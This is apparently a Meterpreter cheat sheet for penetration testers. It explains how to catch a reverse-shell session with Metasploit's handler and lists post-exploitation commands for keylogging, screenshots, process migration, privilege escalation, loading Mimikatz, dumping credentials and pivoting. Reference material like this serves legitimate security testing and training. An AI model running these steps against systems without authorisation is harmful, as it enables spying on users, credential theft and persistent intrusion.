Creating a Session
To create a session, a Meterpreter payload must be executed on the target machine. A Meterpreter payload can be handled by exploit/multi/handler.
In order to create a session, first generate and upload a Meterpreter reverse shell payload. Modify $IP and $PORT as needed.
On the attacker machine, run the following in msfconsole. See advanced for encoding the stager.
Use Automigration on Windows!
If Meterpreter is embedded into a binary (e.g., with shellter) or injected on the stack, then the connection will die when Meterpreter finishes. This can be prevented with migration. To do so, run the following in the handler: set AutoRunScript post/windows/manage/migrate
Run the uploaded shell executable on the vulnerable host.
The Meterpreter session should appear in the Metasploit console shortly afterwards.
Transport
Meterpreter allows an attacker to change the type of traffic used.
Meterpreter Usage
General
sysinfo: gather basic info about the remote machine
shell: launch a shell
File Transfer
upload LOCAL REMOTE: upload a file to the remote machine
download REMOTE LOCAL: download a file to the local machine
Peeping
Note that these commands run under the current user. Migrate as necessary.
screenshot: capture a screenshot
keyscan_start: start keylogging
keyscan_dump: dump the current keylog results
keyscan_stop: stop keylogging
Process Management & Migration
ps: list processes
migrate PID: migrate to PID given sufficient privileges (the target process should have the same privilege level as, or lower than, the current process)
Post-exploitation Modules
Using a Windows UAC bypass as an example (this one works on the Fall Creators Update at least)
Extensions
load EXTENSION: load a given extension
load powershell: load the PowerShell extension
powershell_execute "$PSVersionTable.PSVersion": get the PowerShell version
load kiwi: load Mimikatz
getsystem: try to elevate to SYSTEM from a high-integrity shell
creds_msv: dump MSV credentials
Pivoting
portfwd add -l LOCAL -p REMOTE -r REMOTE_IP